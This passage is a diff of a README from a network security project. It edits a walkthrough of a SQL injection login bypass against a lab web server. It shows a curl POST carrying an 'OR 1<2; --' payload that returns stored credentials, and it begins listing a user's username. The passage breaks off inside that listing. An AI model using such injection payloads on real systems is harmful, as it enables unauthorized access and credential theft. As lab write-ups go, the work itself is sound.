Tony177/NetworkSecurity-Project/README.md

 `{"success":false,"response":"No user found","result":[]}`

-and we can try last one with MySQL injection using OR and commenting syntax
+Lastly, we can try one with MySQL injection using OR and commenting syntax:

 ```bash
 curl -X POST -d 'username=" OR 1<2; -- &password=b' 193.20.3.1:8080
 ```

-which return us a bunch of credentials
+which returns a list of credentials:

 <img src="https://github.com/Tony177/NetworkSecurity-Project/raw/main/Image/webserver_sql.png" width=700>

-including only one user called Tom with:
+including only one entry related to a user named Tom with credentials:

 ```
 username = tcasaccio1